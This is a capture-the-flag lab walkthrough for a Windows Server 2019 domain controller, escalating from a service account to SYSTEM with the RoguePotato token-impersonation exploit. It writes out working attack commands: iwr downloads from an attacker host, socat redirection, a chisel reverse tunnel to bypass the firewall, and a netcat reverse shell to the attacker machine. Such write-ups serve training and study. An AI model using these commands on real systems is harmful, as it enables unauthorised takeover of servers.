Rogue Potato
the sqlsvc user has both seassignprimarytokenprivilege and seimpersonateprivilege set. this makes the target system vulnerable to the potato exploits
I would usually use JuicyPotato for token impersonation, but it does not work on anything above Windows 10 1809 & Windows Server 2019
the target system is windows server 2019, so i will be using an alternative; roguepotato
- Rogue Potato instruct the DCOM server to perform a remote OXID query by specifying a remote IP (Attacker IP)
- On the remote IP, setup a “socat” listener for redirecting the OXID resolutions requests to a fake OXID RPC Server
- the fake oxid rpc server implements the resolveoxid2 server procedure, which will point to a controlled named pipe
ncacn_np:localhost/pipe/roguepotato[\pipe\epmapper] - The DCOM server will connect to the RPC server in order to perform the IRemUnkown2 interface call. By connecting to the Named Pipe, an “Autentication Callback” will be performed and we could impersonate the caller via RpcImpersonateClient() call.
- then, a token stealer will:
- Get the PID of the rpcss service
- Open the process, list all handles and for each handle try to duplicate it and get the handle type
- If handle type is “Token” and token owner is SYSTEM, try to impersonate and launch a process with CreatProcessAsUser() or CreateProcessWithToken()
What do you need to make it work?
- You need to have a machine under your control where you can perform the redirect and this machine must be accessible on port 135 by the victim
- upload both exe files from the poc. In fact it is also possible to launch the fake OXID Resolver in standalone mode on a Windows machine under our control when the victim’s firewall won’t accept incoming connections. more info: https://0xdf.gitlab.io/2020/09/08/roguepotato-on-remote.html
Exploit
Exploit found online from a GitHub repository
PS C:\Temp> iwr http://10.10.14.9/RoguePotato.exe -outfile C:\Temp\RoguePotato.exe
PS C:\Temp> iwr http://10.10.14.9/GetCLSID.ps1 -outfile C:\Temp\GetCLSID.ps1Delivery Complete
Initial Fail
ps c:\Temp> .\GetCLSID.ps1
.\GetCLSID.ps1
Name Used (GB) Free (GB) Provider Root CurrentLocation
---- --------- --------- -------- ---- ---------------
HKCR Registry HKEY_CLASSES_ROOT
Looking for CLSIDs
Looking for APIDs
Joining CLSIDs and APIDs
pspath : Microsoft.PowerShell.Core\FileSystem::C:\Temp\Windows_Server_2019_Standard
psparentpath : Microsoft.PowerShell.Core\FileSystem::C:\Temp
pschildname : Windows_Server_2019_Standard
psdrive : C
psprovider : Microsoft.PowerShell.Core\FileSystem
psiscontainer : True
name : Windows_Server_2019_Standard
fullname : C:\Temp\Windows_Server_2019_Standard
parent : Temp
exists : True
root : C:\
extension :
creationtime : 08/03/2023 18:17:09
creationtimeutc : 08/03/2023 18:17:09
lastaccesstime : 08/03/2023 18:17:09
lastaccesstimeutc : 08/03/2023 18:17:09
lastwritetime : 08/03/2023 18:17:09
lastwritetimeutc : 08/03/2023 18:17:09
attributes : Directory
mode : d-----
basename : Windows_Server_2019_Standard
target : {}
linktype : Executing the GetCLSID.ps1 PowerShell script to extract all the CLSIDs present in the target system
ps c:\Temp> cd Windows_Server_2019_Standard ; cat CLSID.list
{D6015EC3-FA16-4813-9CA1-DA204574F5DA}
{c980e4c2-c178-4572-935d-a8a429884806}
{F01D6448-0959-4E38-B6F6-B6643D4558FE}
{90F18417-F0F1-484E-9D3C-59DCEEE5DBD8}
{03ca98d6-ff5d-49b8-abc6-03dd84127020}
{6E1F7F3E-760E-45F3-AA8F-5761ABDA272A}
{1F3775BA-4FA2-4CA0-825F-5B9EC63C0029}
{D99E6E73-FC88-11D0-B498-00A0C90312F3}
{69486DD6-C19F-42e8-B508-A53F9F8E67B8}
{FD3659E9-A920-4123-AD64-7FC76C7AACDF}
{d20a3293-3341-4ae8-9aaf-8e397cb63c34}
{42CBFAA7-A4A7-47BB-B422-BD10E9D02700}
{5B99FA76-721C-423C-ADAC-56D03C8A8007}
{ddcfd26b-feed-44cd-b71d-79487d2e5e5a}
{7022a3b3-d004-4f52-af11-e9e987fee25f}
{8C482DCE-2644-4419-AEFF-189219F916B9}
{8B4B437E-4CAB-4e83-89F6-7F9F7DF414EA}
{0A886F29-465A-4aea-8B8E-BE926BFAE83E}
{FFE1E5FE-F1F0-48C8-953E-72BA272F2744}
{C63261E4-6052-41FF-B919-496FECF4C4E5}
{42C21DF5-FB58-4102-90E9-96A213DC7CE8}
{1BE1F766-5536-11D1-B726-00C04FB926AF}
{35b1d3bb-2d4e-4a7c-9af0-f2f677af7c30}
{145B4335-FE2A-4927-A040-7C35AD3180EF}
{D3DCB472-7261-43ce-924B-0704BD730D5F}
{805a61d6-44c1-48c0-8af1-721a248effed}
{E0F55444-C140-4EF4-BDA3-621554EDB573}
{08D9DFDF-C6F7-404A-A20F-66EEC0A609CD}
{22f5b1df-7d7a-4d21-97f8-c21aefba859c}
{5BF9AA75-D7FF-4aee-AA2C-96810586456D}
{5C03E1B1-EB13-4DF1-8943-2FE8E7D5F309}
{43664EB4-06AE-480C-8388-165A11512E46}
{000C101C-0000-0000-C000-000000000046}
{6FE54E0E-009F-4E3D-A830-EDFA71E1F306}
{A47979D2-C419-11D9-A5B4-001185AD2B89}
{854A20FB-2D44-457D-992F-EF13785D2B51}
{BA677074-762C-444b-94C8-8C83F93F6605}
{581333F6-28DB-41BE-BC7A-FF201F12F3F6}
{F0FF8EBB-F14D-4369-BD2E-D84FBF6122D6}
{1B48339C-D15E-45F3-AD55-A851CB66BE6B}
{233F8888-506F-45BE-8B87-DFBF08F54C12}
{49E6370B-AB71-40AB-92F4-B009593E4518}
{14E1D985-892F-4F52-A866-6B1AE6A53DFE}
{555F3418-D99E-4E51-800A-6E89CFD8B1D7}
{e7921051-7828-4d09-b4fe-aa5393e85971}
{A1F4E726-8CF1-11D1-BF92-0060081ED811}
{B6C292BC-7C88-41EE-8B54-8EC92617E599}
{65EE1DBA-8FF4-4a58-AC1C-3470EE2F376A}
{F9A874B6-F8A8-4D73-B5A8-AB610816828B}
{50D185B9-FFF3-4656-92C7-E4018DA4361D}
{3c6859ce-230b-48a4-be6c-932c0c202048}
{F556F9B2-C810-44A2-BA7A-3AB8C24E666D}
{0fb40f0d-1021-4022-8da0-aab0588dfc8b}
{B91D5831-B1BD-4608-8198-D72E155020F7}
{7D1933CB-86F6-4A98-8628-01BE94C9A575}
{397a2e5f-348c-482d-b9a3-57d383b483cd}
{0B5A2C52-3EB9-470a-96E2-6C6D4570E40F}
{72566e27-1abb-4eb3-b4f0-eb431cb1cb32}
{02ECA72E-27DA-40E1-BDB1-4423CE649AD9}
{84C22490-C68A-4492-B3A6-3B7CB17FA122}
{9A3E1311-23F8-42DC-815F-DDBC763D50BB}
{97061DF1-33AA-4B30-9A92-647546D943F3}
{119817C9-666D-4053-AEDA-627D0E25CCEF}
{0E9A7BB5-F699-4D66-8A47-B919F5B6A1DB}
{2781761E-28E2-4109-99FE-B9D127C57AFE}
{8BC3F05E-D86B-11D0-A075-00C04FB68820}
{6150FC78-21A1-46A4-BF3F-897090C6D79D}
{3185a766-b338-11e4-a71e-12e3f512a338}
{1FD1B5A7-5C96-4711-A7C3-FFF6D21F93D9}
{1FFE4FFD-25B1-40B1-A1EA-EF633353BB4E}
{30766BD2-EA1C-4F28-BF27-0B44E2F68DB7}
{b8fc52f5-cb03-4e10-8bcb-e3ec794c54a5}While all of the CLSIDs above are present in the system, not all of them are running with the SYSTEM privileges. If the default CLSID from RoguePotato.exe fails, I would need to go one by one.
┌──(kali㉿kali)-[~/…/htb/labs/scrambled/potato]
└─$ socat -v tcp-listen:135,reuseaddr,fork tcp:10.10.11.168:5555Starting a network redirector on Kali.
Anything coming in through the Kali’s TCP port 135 gets forwarded to the target TCP port 5555 where RoguePotato.exe will be listening on for the OXID Resolver Request from Kali to resolve it locally by the exploit
c:\Temp> C:\Temp\RoguePotato.exe -r 10.10.14.9 -e "C:\temp\nc64.exe 10.10.14.9 1234 -e cmd" -l 5555
[+] Starting RoguePotato...
[*] Creating Rogue OXID resolver thread
[*] Creating Pipe Server thread..
[*] Creating TriggerDCOM thread...
[*] Listening on pipe \\.\pipe\RoguePotato\pipe\epmapper, waiting for client to connect
[*] calling cogetinstancefromistorage with clsid:{4991d34b-80a1-4291-83b6-3328366b9097}
[*] Starting RogueOxidResolver RPC Server listening on port 5555 ...
[*] istoragetrigger written:102 bytes
[-] Named pipe didn't received any connect request. Exiting ... Initial attempt of RoguePotato.exe fails
It looks like the network redirector on Kali received the traffic but failed to deliver it back to the target TCP port 5555 as it timed out
Checking the network traffic with Wireshark reveals that RoguePotato.exe never received anything on the port 5555 although there were 3 TCP retransmission attempts made by the network redirector on Kali
This is most likely due to the firewall blocking incoming connection
I saw earlier that the firewall is enabled and active
This is why RoguePotato.exe failed because the firewall was blocking the incoming traffic(The forwarded OXID Resolver Request) on the target port 5555
This would require tunneling
I will be using chisel for tunneling
Tunneling
PS C:\Temp> iwr http://10.10.14.9/chiselx64.exe -outfile C:\Temp\chiselx64.exeDelivery complete
┌──(kali㉿kali)-[~/…/htb/labs/scrambled/potato]
└─$ chisel server -p 55555 --reverse -v
2023/03/08 19:32:07 server: Reverse tunnelling enabled
2023/03/08 19:32:07 server: Fingerprint dTb1NbbGSm09Szd7Q9hoCLNcmEBgV1xMRpkWop8DwU0=
2023/03/08 19:32:07 server: Listening on http://0.0.0.0:55555Running a chisel server on Kali port 55555
┌──(kali㉿kali)-[~/…/htb/labs/scrambled/potato]
└─$ socat -v tcp-listen:135,reuseaddr,fork tcp:10.10.14.9:5555 This network forwarder above will initially receive the OXID Resolver Request from RoguePotato.exe to the Kali port 135 and forward it to tcp:10.10.14.9:5555
It’s important to note that the 10.10.14.9 interface is a Kali’s virtual interface connected to the target network
C:\Temp> C:\Temp\chiselx64.exe client 10.10.14.9:55555 R:10.10.14.9:5555:127.0.0.1:5555
2023/03/08 18:35:51 client: Connecting to ws://10.10.14.9:55555
2023/03/08 18:35:51 client: Connected (Latency 32.5296ms)
In a new session, I will now tunnel the Kali’s socket, 10.10.14.9:5555, to the target’s socket, 127.0.0.1:5555
The OXID Resolver Request will be passed back to RoguePotato.exe through the tunnel as its exploit is listening on port 5555
It would look like this overall, except port being 5555 not 9999
Exploitation
ps c:\Temp> C:\Temp\RoguePotato.exe -r 10.10.14.9 -e "C:\temp\nc64.exe 10.10.14.9 1234 -e cmd" -l 5555
[+] Starting RoguePotato...
[*] Creating Rogue OXID resolver thread
[*] Creating Pipe Server thread..
[*] Creating TriggerDCOM thread...
[*] Listening on pipe \\.\pipe\RoguePotato\pipe\epmapper, waiting for client to connect
[*] calling cogetinstancefromistorage with clsid:{4991d34b-80a1-4291-83b6-3328366b9097}
[*] Starting RogueOxidResolver RPC Server listening on port 5555 ...
[*] istoragetrigger written:102 bytes
[*] SecurityCallback RPC call
[*] ServerAlive2 RPC Call
[*] SecurityCallback RPC call
[*] ResolveOxid2 RPC call, this is for us!
[*] resolveoxid2: returned endpoint binding information = ncacn_np:localhost/pipe/RoguePotato[\pipe\epmapper]
[*] Client connected!
[+] Got SYSTEM Token!!!
[*] token has se_assign_primary_name, using createprocessasuser() for launching: C:\temp\nc64.exe 10.10.14.9 1234 -e cmd
[+] roguepotato gave you the system powerz :DRoguePotato.exe received the OXID Resolver Request from the Kali’s network forwarder and exploited it Successful exploit triggered the reverse shell.
┌──(kali㉿kali)-[~/…/htb/labs/scrambled/potato]
└─$ socat -v tcp-listen:135,reuseaddr,fork tcp:10.10.14.9:5555
> 2023/03/08 19:39:15.000436688 length=116 from=0 to=115
..\v.....t...........................`r.......!4z.....]........\b.+.h`............`r.......!4z....,..l..@e............< 2023/03/08 19:39:15.000498189 length=84 from=0 to=83
..\f.....t.............%\v..5555...........]........\b.+.h`............................> 2023/03/08 19:39:15.000528115 length=24 from=116 to=139
........................< 2023/03/08 19:39:15.000558681 length=40 from=84 to=123
........(...............................> 2023/03/08 19:39:15.000653981 length=72 from=0 to=71
..\v.....h.............%\v............`r.......!4z.....]........\b.+.h`....< 2023/03/08 19:39:15.000717090 length=60 from=0 to=59
..\f.....<.............%\v..5555...........]........\b.+.h`....> 2023/03/08 19:39:15.000746466 length=42 from=72 to=113
........*...............$...pp).........\a.< 2023/03/08 19:39:15.000776589 length=220 from=60 to=279
............................M...M.-...l.o.c.a.l.h.o.s.t./.p.i.p.e./.R.o.g.u.e.P.o.t.a.t.o.[.\\.p.i.p.e.\\.e.p.m.a.p.p.e.r.].....
...N.T. .A.U.T.H.O.R.I.T.Y.\\.N.E.T.W.O.R.K. .S.E.R.V.I.C.E...........`R.......!4z......\a.....With the -v flag, I can also see the verbose traffic data of the Socat network forwarder
it forwarded the oxid resolver request to the kali’s socket, 10.10.14.9:5555, which is tunneled to the target socket, 127.0.0.1:5555, where RoguePotato.exe was listening
┌──(kali㉿kali)-[~/…/htb/labs/scrambled/potato]
└─$ nnc 1234
listening on [any] 1234 ...
connect to [10.10.14.9] from (UNKNOWN) [10.10.11.168] 54608
Microsoft Windows [Version 10.0.17763.2989]
(c) 2018 Microsoft Corporation. All rights reserved.
c:\Temp> whoami
whoami
nt authority\system
c:\Temp> hostname
hostname
DC1
c:\Temp> ipconfig
ipconfig
Windows IP Configuration
ethernet adapter ethernet0 2:
connection-specific dns suffix . : htb
ipv6 address. . . . . . . . . . . : dead:beef::181
ipv6 address. . . . . . . . . . . : dead:beef::8516:7ac6:78b:c7b
link-local ipv6 address . . . . . : fe80::8516:7ac6:78b:c7b%14
ipv4 address. . . . . . . . . . . : 10.10.11.168
subnet mask . . . . . . . . . . . : 255.255.254.0
default gateway . . . . . . . . . : fe80::250:56ff:feb9:eec2%14
10.10.10.2System Level Compromise